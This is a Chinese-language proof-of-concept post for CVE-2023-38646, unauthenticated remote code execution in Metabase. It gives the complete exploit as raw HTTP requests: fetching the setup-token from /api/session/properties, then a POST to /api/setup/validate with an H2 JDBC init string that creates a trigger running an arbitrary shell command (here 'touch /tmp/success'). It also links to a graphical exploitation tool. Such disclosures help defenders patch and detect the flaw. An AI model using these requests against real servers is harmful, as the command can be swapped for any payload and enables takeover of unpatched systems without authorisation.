Metabase 是一个开源数据分析平台,0.46.6.1 之前的开源 Metabase 和 1.46.6.1 之前的 Metabase Enterprise 允许未经身份验证的攻击者以服务器的权限级别在服务器上执行任意命令。此问题是由设置请求中的 JDBC url 攻击引起的。
构造:
首先,使用以下请求来检索setup-token:
GET /api/session/properties HTTP/1.1Host: localhost:3000Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Connection: closeCache-Control: max-age=0
该漏洞只能通过获取此设置令牌来利用。
其次,将您的请求替换[setup-token]为以下请求然后发送:
POST /api/setup/validate HTTP/1.1 Host: localhost:3000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: application/json Content-Length: 739 { "token": "[setup-token]", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;", "advanced-options": false, "ssl": true, "init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$" }, "name": "an-sec-research-team", "engine": "h2" } }
可以看到,touch /tmp/success已经执行成功:
https://github.com/Boogipop/MetabaseRceTools
CVE-2023-38646 RCE 图形化利用工具
浙公网安备 33010602011771号